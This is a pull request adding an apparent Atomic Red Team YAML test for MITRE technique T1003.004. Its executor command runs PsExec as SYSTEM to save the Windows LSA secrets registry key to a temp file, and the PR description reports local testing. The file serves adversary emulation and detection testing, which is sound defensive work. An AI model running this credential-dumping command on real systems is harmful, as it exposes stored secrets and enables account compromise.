### PR TITLE
Create T1003.004.yaml

### DIFF
--- a/atomics/T1003.004/T1003.004.yaml
+++ b/atomics/T1003.004/T1003.004.yaml
@@ -2,47 +2,25 @@ attack_technique: T1003.004
 display_name: "OS Credential Dumping: LSA Secrets"
 atomic_tests:
 - name: Dumping LSA Secrets
-
   description: Dump secrets key from Windows registry
-
   supported_platforms:
-
   - windows
-
   input_arguments:
-
     psexec_exe:
-
       description: Path to PsExec executable
-
-      type: String
-
+      type: Path
       default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe
-
   dependency_executor_name: powershell
-
   dependencies:
-
   - description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
-
     prereq_command: 'if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}'
-
     get_prereq_command: |-
-
       Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
-
       Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
-
       New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
-
       Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
-
   executor:
-
     command: '#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets'
-
     cleanup_command: del %temp%\secrets >nul 2> nul
-
     name: command_prompt
-
     elevation_required: true

--- a/atomics/T1003.004/T1003.004.yaml
+++ b/atomics/T1003.004/T1003.004.yaml
@@ -1,0 +1,48 @@
+attack_technique: T1003.004
+display_name: "OS Credential Dumping: LSA Secrets"
+atomic_tests:
+- name: Dumping LSA Secrets
+
+  description: Dump secrets key from Windows registry
+
+  supported_platforms:
+
+  - windows
+
+  input_arguments:
+
+    psexec_exe:
+
+      description: Path to PsExec executable
+
+      type: String
+
+      default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe
+
+  dependency_executor_name: powershell
+
+  dependencies:
+
+  - description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
+
+    prereq_command: 'if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}'
+
+    get_prereq_command: |-
+
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
+
+      Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
+
+      New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
+
+      Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
+
+  executor:
+
+    command: '#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets'
+
+    cleanup_command: del %temp%\secrets >nul 2> nul
+
+    name: command_prompt
+
+    elevation_required: true


### PR DESCRIPTION
**Details:**
This is my first draft for a new atomic, T1003.004. This atomic includes a single test, dump LSA secrets from the Windows registry as SYSTEM.

**Testing:**
Local testing was done on the attack and cleanup. A local copy of PsExec was created in: PathToAtomicsFolder\T1003.004\bin\PsExec.exe. The secrets key is copied to %temp%\secrets. All testing was successful within my local environment.

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->